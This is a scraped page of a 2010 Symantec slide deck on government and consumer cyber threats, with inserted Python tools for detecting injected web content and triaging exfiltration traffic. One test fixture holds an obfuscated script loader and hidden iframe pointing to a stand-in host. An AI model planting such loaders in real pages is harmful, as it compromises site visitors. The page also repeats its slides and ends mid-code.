Dealing with security threats
A more connected world than what you think…

Ilias Chantzos
Director EMEA & APJ Government Relations

Kenya, 9 March 2010
Agenda
• A bit about Symantec and where 
  the information comes from
• The current threat landscape
  – Threats to government and national 
    security/CIIP
  – Threats to consumers
  – Examples
• Anatomy of a security breach
• Operationalising security
Symantec Global Presence
Global Intelligence Network (GIN)
• Attack activity: 240,000 sensors in 200+ countries
• Malcode intelligence: 130M+ clients, servers and gateways
• Vulnerabilities: 32,000+ vulnerabilities, 11,000 vendors, 72k technologies
• Spam/phishing: 2.5M decoy accounts, 8B+ emails analyzed daily
(World map of Symantec sites omitted.)
4 MSS Security Operations Centers – 11 Security Research Centers – 29 Global Support Centers
Government – Commercial – Consumer
How Likely Is It?
• To be struck by lightning? 1 in 2.6M
• To be bitten by a snake? 1 in 42M
• To be in a car accident? 1 in 300
• To be attacked online? 1 in 5
The current threat landscape
    Threats to Government and CIIP



Malicious code is installed…
• Over 60% of all malicious code ever detected by Symantec was discovered in 2008.
• Over 90% of threats are threats to confidential information.
Information is at risk
• Majority of data breaches in Education (27%), followed by Government (20%) and Healthcare (15%)
• More than half of breaches (57%) due to theft or loss, followed by insecure policy (21%)
Threat Activity Trends - Malicious Activity
• In 2008 the United States was the top country for malicious activity (raw numbers) with 23% of the overall proportion. China was ranked second with 9%.
• As Internet and broadband use grows in certain countries, their share of malicious activity also grows.
Governments Are Prime Targets
• Data breach at federal government jobsite USAJobs.gov: "Certain contact and account data were taken, including user IDs and passwords, email addresses, names, phone numbers, and some basic demographic data."
• Government travel site GovTrip.gov users suffer malware attacks: "Hackers breached the site, then modified it to redirect users to a rogue URL that in turn directed attack code against their systems."
• Defra website using Wiki editing techniques defaced: "Administrators … were forced to withdraw the page after it was defaced by more than 170 people over a frenzied few hours."
• DoS attacks on Swedish police and official government website: "Shortly after police confiscated the group's servers, DoS attacks took the official government website and the Swedish national police site offline. The attacks were assumed to be a reprisal from disgruntled Pirate Bay users."
Different threat scenarios
• Collect intelligence on the infrastructure
   – To attack the infrastructure
   – To determine the location of valuable 
     information
• Collect intelligence
   – Capture  and extract information
   – Intercept communications and ciphers
• Disable the infrastructure
   – That you have already infiltrated
   – Directly attack it from outside
• Collect OSINT
• Conduct Psyops
• Achieve information dominance by 
  communicating your own message
Causing problems to the navy
Stopping the air force
Information leaking
Using COTS to collect intelligence
DDoS on Estonia: some stats
• 128 unique DDoS attacks:
   – 115 ICMP floods
   – 4 TCP SYN floods
   – 9 generic traffic floods
• Attack duration:
   – 17 attacks: less than 1 minute
   – 78 attacks: 1 minute to 1 hour
   – 16 attacks: 1 hour to 5 hours
   – 8 attacks: 5 hours to 9 hours
   – 7 attacks: 10 hours or more
• Daily attack rate (attack-intensity chart for 3–11 May 2007 omitted):
   – 03/05/2007 = 21
   – 04/05/2007 = 17
   – 08/05/2007 = 31
   – 09/05/2007 = 58
   – 11/05/2007 = 1
• Peak saw traffic equivalent to 5,000 clicks per second
• Attacks stopped at midnight
• Tactics shifted as weaknesses emerged
• Swamped web sites associated with government ministries, banks, newspapers and broadcasters
• Emergency services number disabled for at least 1 hour
• Access was cut to sites outside of Estonia in order to keep local access available
Source: ArborSert
Cyber defense and shooting warfare
• Why blow something up?
  – If you can use it to collect intelligence
  – If you can disable it when you want
  – If you can use it afterwards again


• Russian attack in Georgia
  – Information‐intelligence is power
  – Preceded by cyber attack
  – Psychological effect/operations
  – Information dominance 
  – Propaganda
Taking down the traffic grid
Energy supply and distribution
   1999 SCADA failure in Bellingham, Washington: ¼ million gallons of gasoline
Attacking the energy grid
Collecting OSINT
A Real And Present Danger
Suddenly the blue screen of death has a different meaning…
• FOOD, WATER, ENERGY
• SEA, AIR, ROAD & RAIL TRAFFIC
• IT & TELECOMS
• FINANCE
• MILITARY
Current and future trends
• Hacking is for fortune not for fame
• Attackers become more sophisticated and 
  well invested
• Target is confidential information
• Attack techniques increase in 
  sophistication and stealth
  – Single use malware
  – Evasion techniques (web and coding)
• Increased sophistication of botnets
• Virtual worlds and social engineering
• Critical infrastructure protection is dependent on Internet security
Threats to consumers…
Stolen information is sold
• Credit card information (32%) and bank account credentials (19%) continue to be the most frequently advertised items.
• The price range of credit cards remained consistent in 2008, ranging from $0.06 to $30 per card number.
• Compromised email accounts can provide access to other confidential information and additional resources.
Website compromise
• Attackers locate and compromise a high-traffic site through a vulnerability specific to the site or in a Web application it hosts.
• Once the site is compromised, attackers modify pages so malicious content is served to visitors.
Two entry points: site-specific vulnerabilities and Web application vulnerabilities.
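The second bullet is what a site owner can actually check for: fetch the page as a visitor sees it and look for content the origin never published. The following is an added example, not code from the slides or from Symantec; the host name www.agency.example, the loader.invalid URLs and both sample pages are constructed for the demonstration. It flags scripts loaded from hosts outside an allowlist, iframes that are hidden or point off-origin, and inline scripts carrying the decoding calls that injected loaders commonly use.

```python
"""Check a page as actually served against the site's own hosts and flag the
injected content the slide describes: off-origin scripts, hidden or foreign
iframes, and inline scripts with common obfuscation markers.
Added example, not from the original slides."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings that frequently appear in injected, obfuscated loader scripts.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "document.write(", "fromCharCode")


class InjectedContentFinder(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._script_text = None  # list while inside <script>, else None

    def _off_origin(self, url):
        host = urlparse(url or "").hostname
        return bool(host) and host.lower() not in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._script_text = []
            if self._off_origin(a.get("src")):
                self.findings.append(f"off-origin script: {a['src']}")
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = a.get("width") == "0" or a.get("height") == "0" or "display:none" in style
            if hidden or self._off_origin(a.get("src")):
                self.findings.append(f"{'hidden ' if hidden else ''}iframe: {a.get('src', '')}")

    def handle_data(self, data):
        if self._script_text is not None:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_text is not None:
            body = "".join(self._script_text)
            self._script_text = None
            hits = [m for m in OBFUSCATION_MARKERS if m in body]
            if hits:
                self.findings.append("obfuscated inline script: " + ", ".join(hits))


def find_injected_content(html, allowed_hosts):
    """Return a list of human-readable findings; empty means nothing suspicious."""
    parser = InjectedContentFinder(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed samples: a clean page and the same page with injected content.
SITE_HOSTS = ["www.agency.example"]  # hypothetical site
CLEAN_PAGE = (
    '<html><head><script src="https://www.agency.example/js/app.js"></script></head>'
    "<body><h1>Welcome</h1>"
    '<iframe src="https://www.agency.example/embed/map"></iframe></body></html>'
)
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://loader.invalid/in.cgi?3" width="0" height="0"></iframe>'
    '<script>document.write(unescape("%3Cscript src=%22http://loader.invalid/x.js%22%3E%3C/script%3E"))</script>'
    "</body>",
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, find_injected_content(page, SITE_HOSTS) or ["no findings"])
```

Run this from a host outside the site's own network, because compromised pages are often served selectively (by referrer, user agent or visitor IP), so a check from the administrator's desk can see a clean page while visitors get the injected one. The allowlist should contain every host the site legitimately loads from, including CDNs, otherwise the check is noisy and gets ignored.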
Vulnerability Trends
Browser plug-in vulnerabilities
• Vulnerabilities in Web browser plug-ins are frequently exploited to install malicious software.
• Memory corruption vulnerabilities again made up the majority of the vulnerability types in browser plug-in technologies for 2008, with 272 vulnerabilities classified as such.
Vulnerability Trends
Unpatched vulnerabilities by vendor
• In 2008, there were 112 unpatched vulnerabilities affecting enterprise-class vendors, compared to 144 in 2007.
• Microsoft had the most, with a total of 46 unpatched vulnerabilities.
• Of the 112 unpatched enterprise vulnerabilities, 37 were low severity, 71 were medium severity, and 4 were high severity.
Malicious Code Trends
Types
• Trojans made up 68 percent of the volume of the top 50 malicious code samples reported in 2008, a minor decrease from 69 percent in 2007.
• Worms increased slightly from 26% in 2007 to 29% in 2008.
• The percentage of back doors decreased from 21% to 15% in the current period.
Malicious Code Trends
Propagation mechanisms
• 66% of potential malicious code infections propagated as shared executable files, up significantly from 44% in 2007.
• Malicious code using P2P file sharing protocols declined from 17% in 2007 to 10% in 2008.
Spam
Country of Origin
• Over the past year, Symantec observed a 192 percent increase in spam detected across the Internet as a whole, from 119.6 billion messages in 2007 to 349.6 billion in 2008.
• In 2008, bot networks were responsible for the distribution of approximately 90 percent of all spam email.
• Russia, Turkey, and Brazil experienced significant increases in spam volume this year.
Spam
Categories
• Internet-related spam was the top category with 24%, followed by commercial product spam with 19%.
• Financial spam relatively constant at 16%.
An example of how users are exploited
Actors and components in the diagram (the arrows linking them are not recoverable):
• Spammer
• Phisher
• Bot-Herder
• Egg Drop Server
• Phishing Messages → Victims
• Fraud Website (+ Trojan horse)
• Cashier
Anatomy of a security breach



Anatomy of a breach
Actors: Organized Criminal – Well Meaning Insider – Malicious Insider
Outcomes:
• Disruption of operations
• Large-scale DDoS attacks
• Defacing websites
• Malware outbreaks within protected perimeter
• Stealthy ex-filtration or unintended loss of confidential data
Well‐Meaning Insider
(Diagram: employee, desktop and server inside the firewall; hacker outside.)
"Well-Meaning Insider" Breach Sources
1. Data on servers & desktops
2. Lost/stolen laptops, mobile devices
3. Email, Web mail, removable devices
4. Third‐party data loss incidents
5. Business processes
Targeted Attacks
1. INCURSION – Attacker breaks in via targeted malware, improper credentials or SQL injection
2. DISCOVERY – Map organization's systems; automatically find confidential data
3. CAPTURE – Access data on unprotected systems; install root kits to capture network data
4. EXFILTRATION – Confidential data sent to hacker team in the clear, wrapped in encrypted packets or in zipped files with passwords
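The exfiltration stage names three wrappers the defender will see on the wire: cleartext, encrypted blobs, and password-protected zip files. The following is an added example, not code from the slides or from Symantec, showing how an outbound-traffic monitor can triage a captured payload for each of them: a card-number pattern as a stand-in for "confidential data" markers, Shannon entropy for encrypted-looking blobs, and a direct parse of ZIP local file headers for the encryption flag (general-purpose bit 0). All sample payloads, including the zip whose header is patched to look password-protected, are constructed inside the block.

```python
"""Triage outbound payloads for the exfiltration wrappers listed above:
confidential data in the clear, high-entropy (encrypted) blobs, and
password-protected zip files. Added example, not from the original slides."""
import io
import math
import re
import struct
import zipfile
from collections import Counter

# Hypothetical marker for "confidential data": a 16-digit, card-number-like pattern.
CARD_RE = re.compile(rb"\b\d{4}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4.5 for English text, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def zip_encrypted_entries(data: bytes) -> int:
    """Count ZIP local file headers whose general-purpose flag bit 0 is set,
    i.e. entries protected by traditional PKWARE or AES encryption.
    Headers are parsed directly so a truncated capture still yields a verdict."""
    count, pos = 0, 0
    while True:
        pos = data.find(b"PK\x03\x04", pos)
        if pos < 0 or pos + 30 > len(data):
            return count
        (flags,) = struct.unpack_from("<H", data, pos + 6)  # flags sit at offset 6
        count += flags & 0x0001
        pos += 30  # skip the fixed-size header before searching again


def classify_outbound(payload: bytes, entropy_threshold: float = 7.5) -> str:
    """Return a coarse verdict for one captured outbound payload."""
    if payload.startswith(b"PK\x03\x04"):
        return "password-protected zip" if zip_encrypted_entries(payload) else "zip archive"
    if CARD_RE.search(payload):
        return "cleartext with sensitive markers"
    if shannon_entropy(payload) >= entropy_threshold:
        return "high-entropy blob (possible encrypted exfiltration)"
    return "unremarkable"


def make_zip_sample(encrypted: bool) -> bytes:
    """Constructed sample: an in-memory zip of dummy CSV data. With encrypted=True
    the local and central directory headers are patched to set the encryption
    flag, because the standard library reads but does not write encrypted zips."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("export.csv", "id,name\n1,Alice\n2,Bob\n")
    data = bytearray(buf.getvalue())
    if encrypted:
        for signature, flag_offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            data[data.find(signature) + flag_offset] |= 0x01
    return bytes(data)


if __name__ == "__main__":
    # Constructed samples standing in for captured outbound traffic.
    samples = {
        "csv export": b"name,card\nAlice,4111 1111 1111 1111\n",
        "chat message": b"hello team, see you at the meeting",
        "opaque blob": bytes(range(256)) * 4,  # stand-in for ciphertext
        "archive": make_zip_sample(encrypted=True),
    }
    for label, payload in samples.items():
        print(f"{label:13s} -> {classify_outbound(payload)}")
```

The entropy check is a heuristic: compressed images and legitimate TLS also score near 8 bits per byte, so in practice it is combined with destination reputation, volume and time-of-day rather than used alone. The zip flag check is cheap and exact, which is why password-protected archives leaving the network to unfamiliar destinations are a common DLP alert.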
Malicious Insiders
(Diagram: unhappy employee with IM, webmail, email, mobile device, CD/DVD, USB and a home computer as channels across the firewall.)
Malicious Insider: Four Types
1. White collar criminals
2. Terminated employees
3. Career builders
4. Industrial spies
Operationalising security……



Establishing In‐depth Defense
• Future government capabilities are built on interconnected systems and effective information sharing.
• Traditional 'Bastion' security models do not effectively support such agile, interconnected networks.
• Interconnected networks require in-depth, proactive & agile defense at the periphery and the endpoint of infrastructure and information.
Collecting intelligence – Real time situation awareness
"What enables the wise sovereign and the good general to strike and conquer, and achieve things beyond the reach of ordinary men, is foreknowledge."
SUN TZU – The Art of War
Conficker/Downadup – Cumulative (chart omitted)
Source – Conficker Working Group and Shadowserver
How to Stop Security Breaches
• Protect information proactively
• Automate review of entitlements
• Identify threats in real time
• Integrate security operations
• Prevent data exfiltration
• Stop targeted attacks
Thank you!
    Ilias_chantzos@symantec.com




    Copyright © 2010 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in 
    the U.S. and other countries. Other names may be trademarks of their respective owners.

    This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, 
    are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.



 
Day 1 Large Scale Attacks
Day 1   Large Scale AttacksDay 1   Large Scale Attacks
Day 1 Large Scale Attacks
 
Day 1 From CERT To NCSC
Day 1   From CERT To NCSCDay 1   From CERT To NCSC
Day 1 From CERT To NCSC
 
Day 1 Enisa Setting Up A Csirt
Day 1   Enisa   Setting Up A CsirtDay 1   Enisa   Setting Up A Csirt
Day 1 Enisa Setting Up A Csirt
 
Day 1 Coop Banks
Day 1   Coop BanksDay 1   Coop Banks
Day 1 Coop Banks
 

Dernier

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 

Dernier (20)

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 

Dealing with security threats and the current threat landscape

  • 1. Dealing with security threats: A more connected world than what you think… Ilias Chantzos, Director EMEA & APJ Government Relations. Kenya, 9 March 2010
  • 2. Agenda
    • A bit about Symantec and where the information comes from
    • The current threat landscape
      – Threats to government and national security/CIIP
      – Threats to consumers
      – Examples
    • Anatomy of a security breach
    • Operationalising security
  • 3. Symantec Global Presence – Global Intelligence Network (GIN)
    • Attack activity: 240,000 sensors; 200+ countries
    • Malcode intelligence: 130M+ clients, servers, gateways
    • Vulnerabilities: 32,000+ vulnerabilities; 11,000 vendors; 72k techs
    • Spam / phishing: 2.5M decoy accounts; 8B+ emails analyzed daily
    (World map of Symantec office locations across the Americas, Europe, the Middle East, Africa and Asia-Pacific omitted)
    • 4 MSS Security Operations Centers; 11 Security Research Centers; 29 Global Support Centers
    • Government – Commercial – Consumer
  • 4. How Likely Is It?
    • To be struck by lightning? 1 in 2.6M
    • To be bitten by a snake? 1 in 42M
    • To be in a car accident? 1 in 300
    • To be attacked online? 1 in 5
  • 5. The current threat landscape – Threats to Government and CIIP
  • 6. Malicious code is installed…
    • Over 60% of all malicious code detected by Symantec was discovered in 2008.
    • Over 90% of threats are threats to confidential information.
  • 7. Information is at risk
    • Majority of data breaches in Education (27%), followed by Government (20%) and Healthcare (15%)
    • More than half of breaches (57%) due to theft or loss, followed by insecure policy (21%)
  • 8. Threat Activity Trends – Malicious Activity
    • In 2008 the United States was the top country for malicious activity (raw numbers) with 23% of the overall proportion. China was ranked second with 9%.
    • As Internet and broadband use grows in certain countries, their share of malicious activity also grows.
  • 9. Governments Are Prime Targets
    • Data breach at federal government jobsite USAJobs.gov: "Certain contact and account data were taken, including user IDs and passwords, email addresses, names, phone numbers, and some basic demographic data."
    • Government travel site GovTrip.gov users suffer malware attacks: "Hackers breached the site, then modified it to redirect users to a rogue URL that in turn directed attack code against their systems."
    • Defra website using Wiki editing techniques defaced: "Administrators … were forced to withdraw the page after it was defaced by more than 170 people over a frenzied few hours."
    • DoS attacks on Swedish police and official government website: "Shortly after police confiscated the group's servers, DoS attacks took the official government website and the Swedish national police site offline. The attacks were assumed to be a reprisal from disgruntled Pirate Bay users."
  • 10. Different threat scenarios
    • Collect intelligence on the infrastructure
      – To attack the infrastructure
      – To determine the location of valuable information
    • Collect intelligence
      – Capture and extract information
      – Intercept communications and ciphers
    • Disable the infrastructure
      – That you have already infiltrated
      – Directly attack it from outside
    • Collect OSINT
    • Conduct Psyops
    • Achieve information dominance by communicating your own message
  • 15. DDoS on Estonia – some stats
    • Attack duration:
      – Less than 1 minute: 17 attacks
      – 1 minute ~ 1 hour: 78 attacks
      – 1 hour ~ 5 hours: 16 attacks
      – 5 hours ~ 9 hours: 8 attacks
      – 10 hours or more: 7 attacks
    • Daily attack rate:
      – 03/05/2007 = 21
      – 04/05/2007 = 17
      – 08/05/2007 = 31
      – 09/05/2007 = 58
      – 11/05/2007 = 1
    • 128 unique DDoS attacks:
      – 115 – ICMP floods
      – 4 – TCP SYN floods
      – 9 – generic traffic floods
    • Peak saw traffic equivalent of 5000 clicks per second
    • Attacks stopped at midnight
    • Tactics shifted as weaknesses emerged
    • Swamped web sites associated with Government Ministries, Banks, Newspapers & Broadcasters
    • Emergency Services number disabled for at least 1 hour
    • Access was cut to sites outside of Estonia in order to keep local access available
    (Chart: Attack Intensity per day, 03/05/2007 to 11/05/2007)
    Source = ArborSert
  • 16. Cyber defense and shooting warfare
    • Why blow something up?
      – If you can use it to collect intelligence
      – If you can disable it when you want
      – If you can use it afterwards again
    • Russian attack in Georgia
      – Information/intelligence is power
      – Preceded by cyber attack
      – Psychological effect/operations
      – Information dominance
      – Propaganda
  • 18. Energy supply and distribution: 1999 SCADA failure in Bellingham, Washington – ¼ million gallons of gasoline
  • 21. A Real And Present Danger: Suddenly the blue screen of death has a different meaning…
    • FOOD, WATER, ENERGY
    • SEA, AIR, ROAD & RAIL TRAFFIC
    • IT & TELECOMS
    • FINANCE
    • MILITARY
  • 22. Current and future trends
    • Hacking is for fortune, not for fame
    • Attackers become more sophisticated and well invested
    • Target is confidential information
    • Attack techniques increase in sophistication and stealth
      – Single-use malware
      – Evasion techniques (web and coding)
    • Increased sophistication of botnets
    • Virtual worlds and social engineering
    • Critical infrastructure protection dependent on Internet security
  • 24. Stolen information is sold
    • Credit card information (32%) and bank account credentials (19%) continue to be the most frequently advertised items.
    • The price range of credit cards remained consistent in 2008, ranging from $0.06 to $30 per card number.
    • Compromised email accounts can provide access to other confidential information and additional resources.
  • 25. Website compromise
    • Attackers locate and compromise a high-traffic site through a vulnerability specific to the site or in a Web application it hosts.
    • Once the site is compromised, attackers modify pages so malicious content is served to visitors.
    (Diagram: site-specific vulnerabilities; Web application vulnerabilities)
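The defender-side check this slide implies, as an added example that is not from the deck or from Symantec: compare a known-good baseline copy of a page with the copy the site currently serves and flag any script, iframe, object or embed element that is new. The page markup, the path /static/app.js and the domain injected-content.example are constructed placeholders, not real sites.

```python
"""Page-integrity check for served HTML (added example, not from the deck).

Assumes the defender keeps a known-good baseline of each page and periodically
re-fetches the live page; here both copies are constructed inline.
"""
import hashlib
from html.parser import HTMLParser

# Elements an injected payload is usually carried in.  Any element of this kind
# present in the live page but absent from the baseline is reported.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


def _normalise(text: str) -> str:
    """Collapse whitespace so layout-only edits do not raise alerts."""
    return " ".join(text.split())


class _ActiveContentCollector(HTMLParser):
    """Records one (tag, reference) pair per active element in a page.

    External content is identified by its src/data URL; an inline script by a
    hash of its whitespace-normalised body, so two different inline scripts
    are never confused with each other.
    """

    def __init__(self):
        super().__init__()
        self.found = []
        self._script_body = None  # chunks collected while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag not in ACTIVE_TAGS:
            return
        attrs = dict(attrs)
        ref = attrs.get("src") or attrs.get("data")
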